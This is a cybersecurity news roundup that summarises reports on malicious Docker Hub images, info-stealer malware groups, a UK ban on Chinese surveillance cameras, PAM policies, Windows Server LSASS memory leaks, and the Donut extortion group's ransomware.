Docker Hub repositories hide over 1,650 malicious containers

From bleepingcomputer.com

Docker

Over 1,600 publicly available Docker Hub images hide malicious behavior, including cryptocurrency miners, embedded secrets that can be used as backdoors, DNS hijackers, and website redirectors.

Docker Hub is a cloud-based container library allowing people to freely search and download Docker images or upload their creations to the public library or personal repositories.

Docker images are templates for the quick and easy creation of containers that contain ready-to-use code and applications. Therefore, those looking to set up new instances often turn to Docker Hub to quickly find an easily deployable application.

Unfortunately, due to abuse of the service by threat actors, over a thousand malicious uploads introduce severe risks to unsuspecting users deploying malware-laden images on locally hosted or cloud-based containers.

Read more…

Cybercriminals are increasingly using info-stealing malware to target victims

From csoonline.com

credit card theft / credit card fraud / credit card hack

Cybercriminals are increasingly shifting from automated scam-as-a-service to more advanced info stealer malware distributors as the competition for resources increases, and they look for new way to make profits, according to a report by Group-IB. 

The cybersecurity company has identified 34 Russian-speaking groups distributing info-stealing malware under the stealer-as-a-service model.

Info stealer malware collects users’ credentials stored in browsers, gaming accounts, email services, social media, bank card details, and crypto wallet information from infected computers, and sends the data to the malware operator. This data is then sold or used for fraud on the dark web. 

Read more…

British government bans Chinese surveillance cameras from sensitive locations

From therecord.media

British government bans Chinese surveillance cameras from sensitive locations

The British government has banned departments from installing at sensitive locations surveillance cameras manufactured by Chinese companies due to potential information security issues, and is facing calls to ban them entirely from the public sector.

Announcing the findings of a security review on Thursday, the Cabinet Secretary Oliver Dowden said that the restrictions were being introduced “in light of the threat to the UK and the increasing capability and connectivity of these systems.”

Not only will the equipment be disallowed from sensitive sites, departments have also been advised that the same equipment should never be connected to core networks if installed elsewhere. The updated guidance also encourages departments to consider stripping the cameras out from less sensitive sites too to avoid introducing additional risks.

Read more…

What Is a Privileged Access Management (PAM) Policy?

From heimdalsecurity.com

Cybersecurity technology goes hand in hand with policy-based governance, but simply developing a password policy to protect company data and information is not enough. One of the first steps to successfully implementing a privileged access management (PAM) solution is defining clear and consistent policies that everyone who uses and manages privileged accounts understands and accepts.

Let`s see what a privileged access management (PAM) policy is and why organizations need one.

Read more…

New Windows Server updates cause domain controller freezes, restarts

From bleepingcomputer.com

Windows Server

Microsoft is investigating LSASS memory leaks (caused by Windows Server updates released during the November Patch Tuesday) that might lead to freezes and restarts on some domain controllers.

LSASS (short for Local Security Authority Subsystem Service) is responsible for enforcing security policies on Windows systems, and it handles access token creation, password changes, and user logins.

If this service crashes, logged-in users immediately lose access to Windows accounts on the machine, and they’re shown a system restart error followed by a system reboot.

Read more…

Donut extortion group also targets victims with ransomware

From bleepingcomputer.com

Donut ransomware

The Donut (D0nut) extortion group has been confirmed to deploy ransomware in double-extortion attacks on the enterprise.

BleepingComputer first reported on the Donut extortion group in August, linking them to attacks on Greek natural gas company DESFA, UK architectural firm Sheppard Robson, and multinational construction company Sando.

Strangely, the data for Sando and DESFA was also posted to several ransomware operations’ sites, with the Sando attack claimed by Hive ransomware and DESFA claimed by Ragnar Locker.

Unit 42 researcher Doel Santos also shared that the TOX ID used in ransom notes was seen in samples of the HelloXD ransomware.

This cross-posting of stolen data and affiliation leads us to believe the threat actor behind Donut Leaks is an affiliate for numerous operations, now trying to monetize the data in their own operation.

Read more…